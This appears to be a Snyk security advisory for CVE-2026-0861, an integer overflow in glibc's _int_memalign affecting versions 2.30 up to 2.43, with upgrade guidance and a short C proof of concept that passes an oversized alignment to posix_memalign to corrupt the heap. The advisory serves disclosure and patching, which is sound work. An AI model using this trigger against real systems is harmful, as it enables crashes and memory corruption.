Integer Overflow or Wraparound Affecting glibc package, versions [2.30,2.43)


Severity

Recommended
0.0
medium
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.36% (29th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Integer Overflow or Wraparound vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-UNMANAGED-GLIBC-14945632
  • published15 Jan 2026
  • disclosed14 Jan 2026
  • creditIgor Morgenstern, Aisle Research

Introduced: 14 Jan 2026

CVE-2026-0861  (opens in a new tab)
CWE-190  (opens in a new tab)

How to fix?

Upgrade glibc to version 2.43 or higher.

Overview

Affected versions of this package are vulnerable to Integer Overflow or Wraparound via the _int_memalign function. An attacker can induce heap corruption by supplying an overly large alignment value, which may result in memory corruption or application crashes.

PoC

#include <stdlib.h>
#include <stdint.h>

int main(void) {
void *p;
posix_memalign(&p, 1ULL << 63, PTRDIFF_MAX - 0x30);
return 0;
}

CVSS Base Scores

version 4.0
version 3.1